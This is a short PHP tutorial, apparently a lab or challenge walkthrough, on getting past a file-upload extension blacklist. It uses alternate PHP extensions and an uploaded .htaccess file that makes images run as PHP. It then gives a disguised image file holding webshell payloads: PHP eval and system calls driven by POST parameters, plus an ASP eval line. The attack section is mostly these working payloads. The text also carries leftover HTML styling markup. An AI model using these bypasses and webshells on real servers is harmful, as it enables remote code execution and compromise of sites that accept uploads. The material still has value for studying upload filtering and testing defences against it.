Home > Backend Development > PHP Tutorial > How to bypass blacklist when uploading files

How to bypass blacklist when uploading files

不言
Release: 2023-04-02 14:20:02
Original
6177 people have browsed it

This article mainly introduces the method of bypassing the blacklist by uploading files. It has certain reference value. Now I share it with you. Friends in need can refer to it.

This level mainly involves setting the upload suffix. , restricting suffixes such as asp, php, jsp, etc., and uploading is not allowed.

Position 1: This bypass method is to modify the suffix to .php3, php5, etc. Here is the blacklist verification ('.asp', '.aspx', '.php', '.jsp') , we can upload php3, php5... and other suffix names that can be parsed by the server

##Position 2: Rewrite the file parsing rules to bypass

1. Upload first. Upload a file named

.htaccess with the following content:

SetHandler application/x-httpd-php

##2. Upload 1.jpg script

Content:

GIF89a
<?php eval($_POST[&#39;joker&#39;]);?>
<%eval request("joker")%>
<?php system($_POST[&#39;cmd&#39;]);?>
Copy after login

<span style="margin: 0px; padding: 0px; color: #ff00ff; line-height: 1.5 !important; font-family: "Courier New" !important; font-size: 12px !important"><br/>最后查看结果如下:<br/><img src="https://img.php.cn/upload/article/000/000/009/8c177c6b99f31ac79c542a12d4053de9-3.png" alt=""/><br/></span>
Copy after login
The above is the entire content of this article, I hope it will be helpful to everyone’s study. For more related content, please pay attention to the PHP Chinese website!

Related recommendations:

PHP uses Azure Storage Blob to upload files


Introduction to nginx memcache caching

The above is the detailed content of How to bypass blacklist when uploading files. For more information, please follow other related articles on the PHP Chinese website!

Related labels:
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template